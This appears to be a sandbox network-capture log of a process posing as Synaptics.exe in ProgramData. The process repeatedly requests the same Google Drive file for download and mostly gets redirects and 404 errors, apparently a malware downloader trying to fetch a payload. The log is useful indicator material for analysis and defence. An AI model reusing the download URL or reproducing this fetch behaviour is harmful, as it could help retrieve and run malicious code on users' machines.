                                                                                                                    2024-12-30 10:25:25 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2024-12-30 10:25:26 UTC | 1595 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6NJWRzAGzN6dk7Rk4Q0QhRvXdxRVKEpMmWNU-TskVxm1TNk1I3X8D7u4p65YTUVeg4
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:25 GMT
                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-CTKQS5mfjll2Jmlgd_8V5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Set-Cookie: NID=520=GG50B5bNv6sgXACql__W2PXcKZPl7tvWh7yCyN5O4G1FTVXRl9DITtg7F0NDTb1C9t5S152i_ICLfAe1H2fxnTJ8JrEDVAVRPZae_sL_6AH5SaTjnPk2h4AqLCoE5njkS2pPKExFaP_qi_kRcBh1BP4swSFF2VSB0u2jDSWnNsXH-zRVFWAAOxkC; expires=Tue, 01-Jul-2025 10:25:25 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:26 UTC | 1595 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VoLtni2QMqmtOAH2zhbt0A">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                    2024-12-30 10:25:26 UTC | 57 | IN | Data Ascii: d on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    5 | 192.168.2.9 | 49720 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:25 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2024-12-30 10:25:26 UTC | 1602 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC77wJA2R2cStc_feaZHAIIPpMzFvKXA5mkmJbpAdI4OZeVgzn1zN1VpvzJHxiJFUfw4CTvfvaE
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:26 GMT
                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-jlf0ta-mYkkCMI-P_n4i7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Set-Cookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4; expires=Tue, 01-Jul-2025 10:25:26 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:26 UTC | 1602 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ga88MA3SzJthrgNHDYxDBg">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                    2024-12-30 10:25:26 UTC | 50 | IN | Data Ascii: is server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    6 | 192.168.2.9 | 49725 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:26 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:27 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:26 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-CZn1QAtJP4jzWieZ7QUjiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    7 | 192.168.2.9 | 49724 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:26 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:27 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:26 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-nL55Lj2ukiAXp1mPhWAnUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     8 | 192.168.2.9 | 49726 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     2024-12-30 10:25:26 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                     2024-12-30 10:25:27 UTC | 1601 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC5wi2I7y0K9mY2txpBIIWgKBlThL8-oIBVE46o-CJc5PxteDjP4RoCpMG0c-3-cIMshNtURuCY
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:27 GMT
                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-2K36qYj9mli-atvxMVYbWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Set-Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg; expires=Tue, 01-Jul-2025 10:25:27 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                     2024-12-30 10:25:27 UTC | 1601 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zZHxXGJBW4TzBvmzm2qeGA">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                     2024-12-30 10:25:27 UTC | 51 | IN | Data Ascii: his server. <ins>That’s all we know.</ins></main>


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     9 | 192.168.2.9 | 49727 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     2024-12-30 10:25:26 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                     2024-12-30 10:25:27 UTC | 1595 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4Rk7x6G9Cw79s4CKlRE7KeTlU1mqjjlKVB72oI9FBzAvSObvqiSz5RxvXlvdwPj7jL
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:27 GMT
                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ItDEC91G38a8pGYrGg3IJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Set-Cookie: NID=520=qGDJMLG_t58BS-V2j56tFICrxKsP-s96iV7zJACl0Iwax3pxWGUggnrNtuf7_7rv6xKv31XKe5BeOmnFq96EZD-EkZIVIIpKZY2kJ2SB4_RuWaQWV_SxzywN-Dnl34h_aNSkS9Dyy0XyTdvfDmqVKjIRELt2S9Yfib9Oe9wU6ha3OHDAqdrsl_PK; expires=Tue, 01-Jul-2025 10:25:27 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                     2024-12-30 10:25:27 UTC | 1595 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="DoiUJcRbOGG7WBrLQhTvrQ">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                     2024-12-30 10:25:27 UTC | 57 | IN | Data Ascii: d on this server. <ins>That’s all we know.</ins></main>


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     10 | 192.168.2.9 | 49731 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     2024-12-30 10:25:27 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                     2024-12-30 10:25:28 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:28 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-nrHzaMEm_jWD9JRyLtB0ng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     11 | 192.168.2.9 | 49732 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     2024-12-30 10:25:28 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                     2024-12-30 10:25:28 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:28 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-3b2jCazLwZHWJ-ju5yiobQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     12 | 192.168.2.9 | 49733 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     2024-12-30 10:25:28 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4
                                                                                                                     2024-12-30 10:25:28 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7mbSrGnnhmMv9UmZKzzX2QNDs66DM-0IwkqRgw0upMps9THjGlZTjTws1YRYEYzV0PLDp4bqE
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:28 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-AarvdY-B9VdsfJLqR_57pw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                     2024-12-30 10:25:28 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                     2024-12-30 10:25:28 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="zPFkX-g4sjOwV1pC4VfWiw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                     2024-12-30 10:25:28 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    13 | 192.168.2.9 | 49734 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:28 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    14 | 192.168.2.9 | 49743 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:29 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:29 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC78WH2aQ4H0haM8uSur0MTXrEhLMcknkFGY4awX1-JEYYWodeMjpOk3e8ngSJPmgD0O
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:29 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
